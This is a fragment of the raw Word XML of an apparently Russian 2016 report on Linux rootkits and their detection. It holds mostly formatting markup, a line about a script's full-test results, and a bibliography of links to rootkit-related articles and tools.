          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C310F3" w:rsidRDefault="00C310F3" w:rsidP="005901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14975" cy="3667125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Рисунок 3" descr="https://pp.vk.me/c629225/v629225393/51f95/YznKCjuIl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29225/v629225393/51f95/YznKCjuIlY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0F3" w:rsidRDefault="00C310F3" w:rsidP="00C310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</w:p>
    <w:p w:rsidR="00B05AD4" w:rsidRDefault="00B05AD4" w:rsidP="00C31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AD4" w:rsidRDefault="00B05AD4" w:rsidP="00B05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ы результаты работы скрипта при </w:t>
      </w:r>
      <w:r w:rsidR="005B55BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выборе опции полного тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05AD4" w:rsidRDefault="00B05AD4" w:rsidP="00B05A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AD4" w:rsidRDefault="00B05AD4" w:rsidP="00B05A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3667125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4" name="Рисунок 4" descr="https://pp.vk.me/c629225/v629225393/51f9c/RG4QLZSml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vk.me/c629225/v629225393/51f9c/RG4QLZSmlU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5BA" w:rsidRPr="00CF4307" w:rsidRDefault="005B55BA" w:rsidP="005B5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59014F" w:rsidRPr="00C957A9" w:rsidRDefault="0059014F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Default="0059014F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122786" w:rsidRDefault="00122786" w:rsidP="0059014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0059014F" w:rsidRPr="00C957A9" w:rsidRDefault="0059014F" w:rsidP="0059014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451125780"/>
      <w:r w:rsidRPr="00C957A9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2"/>
    </w:p>
    <w:p w:rsidR="0059014F" w:rsidRPr="00C957A9" w:rsidRDefault="0059014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00736942" w:rsidRPr="00675FF2" w:rsidRDefault="00C014C2" w:rsidP="00675F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6D7FCF" w:rsidRPr="00675FF2">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.windxp.com.ru/rotdel.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006D7FCF" w:rsidRPr="00675FF2" w:rsidRDefault="00C014C2" w:rsidP="00675F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6D7FCF" w:rsidRPr="00675FF2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Pinch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B825A8" w:rsidRPr="00675FF2" w:rsidRDefault="00C014C2" w:rsidP="00675FF2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B825A8" w:rsidRPr="00675FF2">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://sonikelf.ru/borba-s-rootkit-rutkitami-v-gnulinux-rootkit-hunter/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0015087C" w:rsidRPr="00675FF2" w:rsidRDefault="00C014C2" w:rsidP="00675FF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:num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hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="0015087C" w:rsidRPr="00675FF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%D0%A0%D1%83%D1%82%D0%BA%D0%B8%D1%82</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0015087C" w:rsidRPr="00675FF2" w:rsidRDefault="00C014C2" w:rsidP="00675FF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="336" w:lineRule="atLeast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15087C" w:rsidRPr="00675FF2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abrahabr.ru/post/145948/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00022165" w:rsidRPr="00675FF2" w:rsidRDefault="00022165" w:rsidP="00675FF2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="336" w:lineRule="atLeast"/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5FF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https://habrahabr.ru/company/xakep/blog/186072/+&amp;cd=1&amp;hl=ru&amp;ct=clnk&amp;gl=ru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015087C" w:rsidRPr="0015087C" w:rsidRDefault="0015087C" w:rsidP="0015087C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24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5087C" w:rsidRDefault="0015087C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B825A8" w:rsidRDefault="00B825A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D7FCF" w:rsidRPr="00C957A9" w:rsidRDefault="006D7FCF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p w:rsidR="00736942" w:rsidRPr="00C957A9" w:rsidRDefault="00736942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00736942" w:rsidRPr="00C957A9" w:rsidSect="00554391">
      <w:head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C2" w:rsidRDefault="00C014C2" w:rsidP="003B63D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C014C2" w:rsidRDefault="00C014C2" w:rsidP="003B6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C2" w:rsidRDefault="00C014C2" w:rsidP="003B63D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C014C2" w:rsidRDefault="00C014C2" w:rsidP="003B6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334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</w:tblGrid>
    <w:tr w:rsidR="00F9654D" w:rsidTr="001947BE">
      <w:trPr>
        <w:trHeight w:val="720"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500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2500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</w:tr>
  </w:tbl>
  <w:p w:rsidR="00F9654D" w:rsidRDefault="00F965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F9654D">
      <w:trPr>
        <w:trHeight w:val="720"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1667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9654D" w:rsidRDefault="00F9654D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0635BE">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>19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F9654D" w:rsidRDefault="00F9654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FCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38E0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4E4D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C07679"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A86C1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479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DD05F7B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0823442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1892189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3FF7867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DE073EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4708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301ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E000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61A7B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4506D75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7D6F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71E1039"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3BA26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22B69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F50A2B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E623E0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C3A1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55061"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CBE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A6A86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF4EBF96"/>
    <w:lvl w:ilvl="0" w:tplc="10A00A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5C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CBEC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1D0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D080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D6C55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8069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14E081A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95A45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83B2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43BE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4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2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C4A"/>
    <w:rsid w:val="00004238"/>
    <w:rsid w:val="000062CD"/>
    <w:rsid w:val="00022165"/>
    <w:rsid w:val="00044CF2"/>
    <w:rsid w:val="00051783"/>
    <w:rsid w:val="00053886"/>
    <w:rsid w:val="000635BE"/>
    <w:rsid w:val="00067FA0"/>
    <w:rsid w:val="00085E61"/>
    <w:rsid w:val="000A068C"/>
    <w:rsid w:val="000A2DA9"/>
    <w:rsid w:val="000B2280"/>
    <w:rsid w:val="000B2576"/>
    <w:rsid w:val="000B6176"/>
    <w:rsid w:val="000B7F19"/>
    <w:rsid w:val="000C1F56"/>
    <w:rsid w:val="000C6DF3"/>
    <w:rsid w:val="000E0CA1"/>
    <w:rsid w:val="000E2F4C"/>
    <w:rsid w:val="000F5ED4"/>
    <w:rsid w:val="00100D9F"/>
    <w:rsid w:val="00122786"/>
    <w:rsid w:val="00125C86"/>
    <w:rsid w:val="00130525"/>
    <w:rsid w:val="00134EAD"/>
    <w:rsid w:val="00141029"/>
    <w:rsid w:val="001463EB"/>
    <w:rsid w:val="00147737"/>
    <w:rsid w:val="0015087C"/>
    <w:rsid w:val="00152364"/>
    <w:rsid w:val="001947BE"/>
    <w:rsid w:val="001A1445"/>
    <w:rsid w:val="001A48C3"/>
    <w:rsid w:val="00203F90"/>
    <w:rsid w:val="00204D79"/>
    <w:rsid w:val="00205515"/>
    <w:rsid w:val="00214D54"/>
    <w:rsid w:val="00217057"/>
    <w:rsid w:val="00231A21"/>
    <w:rsid w:val="0023216D"/>
    <w:rsid w:val="0024351A"/>
    <w:rsid w:val="00247E04"/>
    <w:rsid w:val="00265C4A"/>
    <w:rsid w:val="002807AD"/>
    <w:rsid w:val="00287C38"/>
    <w:rsid w:val="00292300"/>
    <w:rsid w:val="002A23AC"/>
    <w:rsid w:val="002C5E5C"/>
    <w:rsid w:val="002C68B7"/>
    <w:rsid w:val="002F4173"/>
    <w:rsid w:val="002F5B10"/>
    <w:rsid w:val="002F5C6E"/>
    <w:rsid w:val="00332295"/>
    <w:rsid w:val="003351AD"/>
    <w:rsid w:val="00347153"/>
    <w:rsid w:val="0036371F"/>
    <w:rsid w:val="003640F7"/>
    <w:rsid w:val="003741EA"/>
    <w:rsid w:val="003876D7"/>
    <w:rsid w:val="003A0226"/>
    <w:rsid w:val="003B63D0"/>
    <w:rsid w:val="003C4BBF"/>
    <w:rsid w:val="00400B66"/>
    <w:rsid w:val="00403F26"/>
    <w:rsid w:val="004513E5"/>
    <w:rsid w:val="00460314"/>
    <w:rsid w:val="00472D07"/>
    <w:rsid w:val="00480667"/>
    <w:rsid w:val="00486A55"/>
    <w:rsid w:val="004A3FB2"/>
    <w:rsid w:val="004B6EDF"/>
    <w:rsid w:val="004C65A3"/>
    <w:rsid w:val="004D5E42"/>
    <w:rsid w:val="004F072E"/>
    <w:rsid w:val="004F38C9"/>
    <w:rsid w:val="004F3D52"/>
    <w:rsid w:val="00501249"/>
    <w:rsid w:val="005222E4"/>
    <w:rsid w:val="00523E3A"/>
    <w:rsid w:val="005247D1"/>
    <w:rsid w:val="00525E6B"/>
    <w:rsid w:val="0053141B"/>
    <w:rsid w:val="0054669C"/>
    <w:rsid w:val="00554391"/>
    <w:rsid w:val="005625EC"/>
    <w:rsid w:val="005804F0"/>
    <w:rsid w:val="0059014F"/>
    <w:rsid w:val="005A6379"/>
    <w:rsid w:val="005B549C"/>
    <w:rsid w:val="005B55BA"/>
    <w:rsid w:val="005C2373"/>
    <w:rsid w:val="005C4DF2"/>
    <w:rsid w:val="005C50A3"/>
    <w:rsid w:val="005C53C0"/>
    <w:rsid w:val="005D7B46"/>
    <w:rsid w:val="005E7219"/>
    <w:rsid w:val="005F6E3C"/>
    <w:rsid w:val="00602CE8"/>
    <w:rsid w:val="00642C93"/>
    <w:rsid w:val="006478CA"/>
    <w:rsid w:val="00674C66"/>
    <w:rsid w:val="00675FF2"/>
    <w:rsid w:val="00697A38"/>
    <w:rsid w:val="00697F7E"/>
    <w:rsid w:val="006B1BDE"/>
    <w:rsid w:val="006B4AA0"/>
    <w:rsid w:val="006C7D6B"/>
    <w:rsid w:val="006D6E25"/>
    <w:rsid w:val="006D7B09"/>
    <w:rsid w:val="006D7FCF"/>
    <w:rsid w:val="006E0051"/>
    <w:rsid w:val="00703696"/>
    <w:rsid w:val="007048F1"/>
    <w:rsid w:val="00705AAF"/>
    <w:rsid w:val="00714386"/>
    <w:rsid w:val="00736942"/>
    <w:rsid w:val="00780FCE"/>
    <w:rsid w:val="00792C27"/>
    <w:rsid w:val="007B24EC"/>
    <w:rsid w:val="007B630A"/>
    <w:rsid w:val="007C6625"/>
    <w:rsid w:val="007D3716"/>
    <w:rsid w:val="007D6D52"/>
    <w:rsid w:val="007D7B3E"/>
    <w:rsid w:val="007E3DA2"/>
    <w:rsid w:val="007E6913"/>
    <w:rsid w:val="007F655E"/>
    <w:rsid w:val="00824E48"/>
    <w:rsid w:val="00840ADB"/>
    <w:rsid w:val="008C1D12"/>
    <w:rsid w:val="008C247F"/>
    <w:rsid w:val="008E60F6"/>
    <w:rsid w:val="00907887"/>
    <w:rsid w:val="00917296"/>
    <w:rsid w:val="009320F4"/>
    <w:rsid w:val="00951D23"/>
    <w:rsid w:val="00963025"/>
    <w:rsid w:val="00965231"/>
    <w:rsid w:val="009830E2"/>
    <w:rsid w:val="009942A2"/>
    <w:rsid w:val="009A2289"/>
    <w:rsid w:val="009B51AC"/>
    <w:rsid w:val="009C041E"/>
    <w:rsid w:val="009C2472"/>
    <w:rsid w:val="009C77FE"/>
    <w:rsid w:val="009C7830"/>
    <w:rsid w:val="009D299E"/>
    <w:rsid w:val="009E34A5"/>
    <w:rsid w:val="009F5231"/>
    <w:rsid w:val="00A03631"/>
    <w:rsid w:val="00A14BFE"/>
    <w:rsid w:val="00A23D9E"/>
    <w:rsid w:val="00A61DB0"/>
    <w:rsid w:val="00A6549B"/>
    <w:rsid w:val="00A72224"/>
    <w:rsid w:val="00A76D82"/>
    <w:rsid w:val="00A8741C"/>
    <w:rsid w:val="00A92DAF"/>
    <w:rsid w:val="00AC0AB8"/>
    <w:rsid w:val="00AD7274"/>
    <w:rsid w:val="00AE3249"/>
    <w:rsid w:val="00AF0544"/>
    <w:rsid w:val="00AF785C"/>
    <w:rsid w:val="00B05AD4"/>
    <w:rsid w:val="00B067EA"/>
    <w:rsid w:val="00B10C53"/>
    <w:rsid w:val="00B14701"/>
    <w:rsid w:val="00B147E3"/>
    <w:rsid w:val="00B6266C"/>
    <w:rsid w:val="00B63874"/>
    <w:rsid w:val="00B74FEF"/>
    <w:rsid w:val="00B825A8"/>
    <w:rsid w:val="00BE5936"/>
    <w:rsid w:val="00BF2916"/>
    <w:rsid w:val="00BF5C25"/>
    <w:rsid w:val="00C014C2"/>
    <w:rsid w:val="00C310F3"/>
    <w:rsid w:val="00C32712"/>
    <w:rsid w:val="00C32A79"/>
    <w:rsid w:val="00C5792E"/>
    <w:rsid w:val="00C83C17"/>
    <w:rsid w:val="00C957A9"/>
    <w:rsid w:val="00CC5391"/>
    <w:rsid w:val="00CC7ED6"/>
    <w:rsid w:val="00CE242F"/>
    <w:rsid w:val="00CF4307"/>
    <w:rsid w:val="00D2123B"/>
    <w:rsid w:val="00D25F57"/>
    <w:rsid w:val="00D6646B"/>
    <w:rsid w:val="00D714DF"/>
    <w:rsid w:val="00D867AA"/>
    <w:rsid w:val="00DD3EC0"/>
    <w:rsid w:val="00DF2687"/>
    <w:rsid w:val="00DF2795"/>
    <w:rsid w:val="00DF2844"/>
    <w:rsid w:val="00DF4D2D"/>
    <w:rsid w:val="00E07267"/>
    <w:rsid w:val="00E1448D"/>
    <w:rsid w:val="00E32CA3"/>
    <w:rsid w:val="00E367E9"/>
    <w:rsid w:val="00E43A47"/>
    <w:rsid w:val="00E50401"/>
    <w:rsid w:val="00E60BD9"/>
    <w:rsid w:val="00E846D2"/>
    <w:rsid w:val="00EA2617"/>
    <w:rsid w:val="00EC1CE0"/>
    <w:rsid w:val="00EE4A95"/>
    <w:rsid w:val="00EE5498"/>
    <w:rsid w:val="00F119DD"/>
    <w:rsid w:val="00F123D3"/>
    <w:rsid w:val="00F13AAE"/>
    <w:rsid w:val="00F2591D"/>
    <w:rsid w:val="00F47017"/>
    <w:rsid w:val="00F57F39"/>
    <w:rsid w:val="00F6352B"/>
    <w:rsid w:val="00F70DBC"/>
    <w:rsid w:val="00F806F9"/>
    <w:rsid w:val="00F86BFB"/>
    <w:rsid w:val="00F9654D"/>
    <w:rsid w:val="00FA08BD"/>
    <w:rsid w:val="00FA0FED"/>
    <w:rsid w:val="00FD0217"/>
    <w:rsid w:val="00FD7C1A"/>
    <w:rsid w:val="00FE4411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B9C2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0469421E-07B2-4026-B750-3669BAE2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B25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E6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E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69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38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C1D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1D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D1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C1D1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3D0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B6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3D0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C7830"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009C7830"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F6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5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B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D6B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="009D2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xb">
    <w:name w:val="txb"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007B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A0%D1%83%D1%82%D0%BA%D0%B8%D1%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cketstormsecurity.com/files/tags/rootkit/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sonikelf.ru/borba-s-rootkit-rutkitami-v-gnulinux-rootkit-h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inc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windxp.com.ru/rotdel.htm" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sonikelf.ru/repozitorii-pakety-zavisimosti-i-menedzher-paketa-v-linux/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habrahabr.ru/post/14594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7C33-0D67-4AA4-9E46-CAB9000A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23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04</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-12T10:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-16T09:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>